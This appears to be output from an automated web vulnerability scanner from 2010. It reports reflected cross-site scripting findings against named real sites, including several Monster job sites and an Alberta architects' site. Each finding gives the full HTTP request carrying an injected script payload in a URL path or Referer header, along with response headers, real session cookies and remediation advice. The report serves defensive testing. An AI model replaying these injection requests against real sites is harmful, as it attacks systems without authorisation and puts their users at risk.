GET /COM/iview/245726341/direct6abb3'%3b94cfe8ba3bc HTTP/1.1 Host: redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AA002=1286756359-11647780; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6:b50e070/1a43a/b8d1492/9cc2/4ceb0bb8:b73afdb/2506e/1065856f/64eb/4ceb26f5; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18:9cc2/1a43a:64eb/2506e; MUID=484C17C84DEE440386469B4B8F7D0E08;
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 7213 Content-Type: text/html Expires: 0 Connection: close Date: Fri, 26 Nov 2010 19:38:25 GMT Connection: close
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3b6b'%3ba2e100f1281 was submitted in the REST URL parameter 4. This input was echoed as e3b6b';a2e100f1281 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /COM/iview/245726341/http:e3b6b'%3ba2e100f1281/ads.bluelithium.com/clk HTTP/1.1 Host: redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AA002=1286756359-11647780; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6:b50e070/1a43a/b8d1492/9cc2/4ceb0bb8:b73afdb/2506e/1065856f/64eb/4ceb26f5; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18:9cc2/1a43a:64eb/2506e; MUID=484C17C84DEE440386469B4B8F7D0E08;
Response
HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7207
Content-Type: text/html
Expires: 0
Connection: close
Date: Fri, 26 Nov 2010 19:38:29 GMT
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a842"><script>alert(1)</script>7ee3acc8e9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /firms-adopt-a-new-name-dialog2a842"><script>alert(1)</script>7ee3acc8e9/?id=675 HTTP/1.1
Host: www.consultingarchitects.ab.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: shoutsession=ujc82v0luq56n24bf2mn599ef5; __utmz=87766666.1290802610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=87766666.398077842.1290802610.1290802610.1290802610.1; __utmc=87766666; __utmb=87766666.2.10.1290802610;
Response
HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 19:52:30 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 35159
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edd5c"><script>alert(1)</script>316d6f63925 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /how-to-hire-an-architectedd5c"><script>alert(1)</script>316d6f63925/?id=675 HTTP/1.1
Host: www.consultingarchitects.ab.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: shoutsession=ujc82v0luq56n24bf2mn599ef5; __utmz=87766666.1290802610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=87766666.398077842.1290802610.1290802610.1290802610.1; __utmc=87766666; __utmb=87766666.2.10.1290802610;
Response
HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 19:52:31 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 35212
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6bf2"><script>alert(1)</script>86397c89833 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /forms/pd__accounting_ifrs HTTP/1.1
Host: apegga.formbin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=e6bf2"><script>alert(1)</script>86397c89833
Response
HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 19:33:23 GMT
Server: Apache
Set-Cookie: fspublicsession=gfdjnusj904okcpnina0vojj92; path=/
Cache-Control: max-age=0
Expires: Fri, 26 Nov 2010 19:33:23 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36536
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40e32'-alert(1)-'766db494522 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1
Host: buscartrabajo.monster.es
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=40e32'-alert(1)-'766db494522
Response
HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 19:33:46 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=anrk3w55f15zjh55blqark55; path=/; HttpOnly
Set-Cookie: webtrends_Profile=true; path=/
Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:33:46 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:33:46 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 346833
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38c07'-alert(1)-'e0c5212367e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1
Host: career-advice.monster.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=38c07'-alert(1)-'e0c5212367e
Response
HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 19:33:27 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=gf3dkku1aqeaop45yhwvym45; path=/; HttpOnly
Set-Cookie: split_scsjsv=47; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:33:27 GMT; path=/
Set-Cookie: scsjsv=0; domain=.monster.ca; path=/
Set-Cookie: split_ssljsv=47; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:33:27 GMT; path=/
Set-Cookie: ssljsv=1; domain=.monster.ca; path=/
Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:33:27 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:33:27 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87116
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1bb73'-alert(1)-'d48c97d5726 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /career-development/careers.aspx HTTP/1.1
Host: career-advice.monster.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=1bb73'-alert(1)-'d48c97d5726
Response
HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 19:33:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=v5d2u045rhq44pn0izphvd55; path=/; HttpOnly
Set-Cookie: split_scsjsv=6; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:33:25 GMT; path=/
Set-Cookie: scsjsv=1; domain=.monster.ca; path=/
Set-Cookie: split_ssljsv=6; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:33:25 GMT; path=/
Set-Cookie: ssljsv=1; domain=.monster.ca; path=/
Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:33:25 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:33:25 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 73598
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11fbe'-alert(1)-'bed7f82964e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /in-the-workplace/careers.aspx HTTP/1.1
Host: career-advice.monster.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=11fbe'-alert(1)-'bed7f82964e
Response
HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 19:33:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=n43nexzltfab1eyd5tzljv55; path=/; HttpOnly
Set-Cookie: split_scsjsv=1; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:33:29 GMT; path=/
Set-Cookie: scsjsv=1; domain=.monster.ca; path=/
Set-Cookie: split_ssljsv=1; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:33:29 GMT; path=/
Set-Cookie: ssljsv=1; domain=.monster.ca; path=/
Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:33:29 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:33:29 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 74786
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bce0b'-alert(1)-'7aa36870cbf was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /job-hunt-strategy/careers.aspx HTTP/1.1
Host: career-advice.monster.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=bce0b'-alert(1)-'7aa36870cbf
Response
HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 19:33:35 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=lplur3zhp3zubq3xlqj1cnqi; path=/; HttpOnly
Set-Cookie: split_scsjsv=25; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:33:35 GMT; path=/
Set-Cookie: scsjsv=0; domain=.monster.ca; path=/
Set-Cookie: split_ssljsv=25; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:33:35 GMT; path=/
Set-Cookie: ssljsv=1; domain=.monster.ca; path=/
Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:33:35 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:33:35 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 76163
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d366'-alert(1)-'9ccc549ada5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /job-interview/careers.aspx HTTP/1.1
Host: career-advice.monster.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=5d366'-alert(1)-'9ccc549ada5
Response
HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 19:33:33 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=diliq045ym2f1lnothehn245; path=/; HttpOnly
Set-Cookie: split_scsjsv=43; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:33:33 GMT; path=/
Set-Cookie: scsjsv=0; domain=.monster.ca; path=/
Set-Cookie: split_ssljsv=43; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:33:33 GMT; path=/
Set-Cookie: ssljsv=1; domain=.monster.ca; path=/
Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:33:33 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:33:33 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 74601
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload beeb9'-alert(1)-'81970acecbe was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /resumes-cover-letters/careers.aspx HTTP/1.1
Host: career-advice.monster.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=beeb9'-alert(1)-'81970acecbe
Response
HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 19:33:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=hcmhli45goeg2ur3nrjvbb45; path=/; HttpOnly
Set-Cookie: split_scsjsv=2; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:33:29 GMT; path=/
Set-Cookie: scsjsv=1; domain=.monster.ca; path=/
Set-Cookie: split_ssljsv=2; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:33:29 GMT; path=/
Set-Cookie: ssljsv=1; domain=.monster.ca; path=/
Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:33:29 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:33:29 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 74675
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2bbac'-alert(1)-'904a6022176 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /salary-benefits/careers.aspx HTTP/1.1
Host: career-advice.monster.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=2bbac'-alert(1)-'904a6022176
Response
HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 19:33:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=cdryz0eouhfjhuijz5isxy55; path=/; HttpOnly
Set-Cookie: split_scsjsv=76; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:33:29 GMT; path=/
Set-Cookie: scsjsv=0; domain=.monster.ca; path=/
Set-Cookie: split_ssljsv=76; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:33:29 GMT; path=/
Set-Cookie: ssljsv=1; domain=.monster.ca; path=/
Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:33:29 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:33:29 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 73501
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5f51'-alert(1)-'d67f0420215 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1
Host: career-services.monster.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=e5f51'-alert(1)-'d67f0420215
Response
HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 19:33:41 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=pbmdqjf4p5d0oz45azp05u45; path=/; HttpOnly
Set-Cookie: split_scsjsv=30; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:33:41 GMT; path=/
Set-Cookie: scsjsv=0; domain=.monster.ca; path=/
Set-Cookie: split_ssljsv=30; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:33:41 GMT; path=/
Set-Cookie: ssljsv=1; domain=.monster.ca; path=/
Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:33:41 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:33:41 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 35517
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ef4b'-alert(1)-'51bf3657a10 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1
Host: cercalavoro.monster.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=4ef4b'-alert(1)-'51bf3657a10
Response
HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 19:35:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=lgrvyy45oinouf553zaryv45; path=/; HttpOnly
Set-Cookie: webtrends_Profile=true; path=/
Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:35:11 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:35:11 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 363424
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81db5'-alert(1)-'428ed200170 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
